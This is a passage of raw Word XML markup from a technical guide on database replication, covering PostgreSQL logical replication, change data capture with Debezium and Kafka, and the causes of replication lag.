      <w:r w:rsidRPr="00496A4D">
        <w:t>Row image (after): {id=42, customer_id=7, amount=100.00, status='pending'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070AFDC4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL logical replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB60A70" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB5A68" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- Publisher (primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B881AF4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>CREATE PUBLICATION my_pub FOR TABLE users, orders;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7ECDF2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="5EAF8571" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>-- Subscriber (replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9F39AA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>CREATE SUBSCRIPTION my_sub CONNECTION 'host=primary ...' PUBLICATION my_pub;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D73DAAB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30989688" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Version-independent:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Primary and replica can run different versions (logical format is stable across versions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D3B306" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Selective replication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Can replicate specific tables, specific columns, or filtered rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87E24C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Heterogeneous replication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Can replicate to a different database system entirely (PostgreSQL → Elasticsearch, MySQL → data warehouse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24012D6A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replica can have its own indexes, views, or additional columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C381100" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1514"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replica can be writable</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> (for local-only data alongside replicated data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF11081" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54130718" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1515"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>More complex to set up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790402A6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1515"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Higher overhead (decoding WAL into logical events costs CPU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E69FD4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1515"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>May not capture all changes (DDL changes, sequences, large objects may need special handling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E55DF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1515"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Conflict potential (if replica is writable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280F4EC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> PostgreSQL (logical replication), MySQL (row-based binlog), MongoDB (oplog), Debezium (CDC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0840E252" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Change Data Capture (CDC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C371C6F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Reading the database's change log (WAL/binlog/oplog) and streaming changes to external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294AB474" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F98FB9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Database WAL → CDC tool (Debezium/Maxwell) → Kafka → Downstream consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B6DEB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">                                                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve"> Elasticsearch (search index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2784B5AD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">                                                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve"> Data warehouse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293A7781" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">                                                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve"> Cache invalidation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4307588B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">                                                        └── Another database (replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDCADAE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Debezium works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFFB63E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1516"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Connects to the database as a replication client (pretends to be a replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF2DB0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1516"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Receives the change stream (WAL/binlog).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57885F26" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1516"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Converts each change to a structured event (JSON/Avro).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B72712" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1516"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Publishes to Kafka topic (one topic per table, typically).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E62B773" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1516"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Downstream consumers process events asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24B5C8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event format (Debezium):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175E8F01" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A0C892" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303B4D26" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  "before": {"id": 42, "name": "Alice", "email": "old@ex.com"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0B88EA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  "after": {"id": 42, "name": "Alice", "email": "new@ex.com"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B90583E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  "source": {"version": "2.0", "connector": "postgresql", "ts_ms": 1716912345000},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B961744" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  "op": "u",  // u=update, c=create, d=delete, r=read (snapshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48077640" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  "ts_ms": 1716912345123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61505A7A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ABE35E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773E804F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replicating to a different database (PostgreSQL → DynamoDB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD5DDF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Maintaining search indexes (database → Elasticsearch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6897018F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Event-driven architectures (database changes trigger downstream processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423CB15" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Cache invalidation (database update → invalidate Redis key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3288F7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Building materialized views in external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BD6F9A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="5E053344">
          <v:rect id="_x0000_i5642" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F5B29" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Replication Lag — The Fundamental Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209032C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 What Replication Lag Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB6934" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8FCEE7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary commits transaction at T=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44014AAF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica receives change at T=50ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009B0274" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica applies change at T=55ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B9DEAD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="56A07813" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replication lag = 55ms (replica is 55ms "behind" the primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652B656A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>During this 55ms window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDE7EA8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1518"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>A read from the primary returns the NEW value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EADC322" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1518"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>A read from the replica returns the OLD value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B23A97F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1518"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>This inconsistency IS replication lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A452D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 What Causes Lag to Grow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AACB999" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal lag (milliseconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F58EBCA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1519"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Network transmission time (primary → replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A699E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1519"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Disk write time on replica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492A5F1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1519"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Typically 1–100ms in same datacenter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F4FCB2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Growing lag (seconds to minutes):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35"/>
        <w:gridCol w:w="5915"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="5D45A04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8F131B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cause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DCAF7F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="6E8D539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22E1D1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Write spike on primary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3DEBD5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Replica can't apply changes as fast as primary generates them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="5011FA9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CBF85B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Long-running transaction on replica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039FB0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Blocks WAL replay (PostgreSQL: queries on replica hold back replay)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="40628D9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C7D3B7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
